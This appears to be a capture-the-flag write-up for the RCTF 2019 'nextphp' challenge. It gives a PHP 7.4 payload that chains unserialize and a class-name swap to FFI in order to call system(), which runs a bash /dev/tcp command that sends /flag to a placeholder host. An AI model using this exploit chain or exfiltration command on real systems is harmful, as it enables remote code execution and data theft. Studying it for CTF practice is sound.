Just read these 3 RFCs for PHP 7.4 and write your own payload:

- [PHP RFC: Preloading](https://wiki.php.net/rfc/preload)
- [PHP RFC: FFI - Foreign Function Interface](https://wiki.php.net/rfc/ffi)
- [PHP RFC: New custom object serialization mechanism](https://wiki.php.net/rfc/custom_object_serialization)

## Payload

```php
class D implements Serializable {
    // Callable name and its argument, carried inside the serialized data
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int system(const char *command);'
    ];

    public function serialize(): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
    }
}

$a = new D();
$b = serialize($a);
// Swap the class name in the serialized string from D to A
$b = str_replace('"D"', '"A"', $b);
$d = unserialize($b);
$d->ret->system('bash -c "cat /flag > /dev/tcp/xxx/xxx"');
```

Original writeup (https://github.com/zsxsoft/my-ctf-challenges/tree/master/rctf2019/nextphp).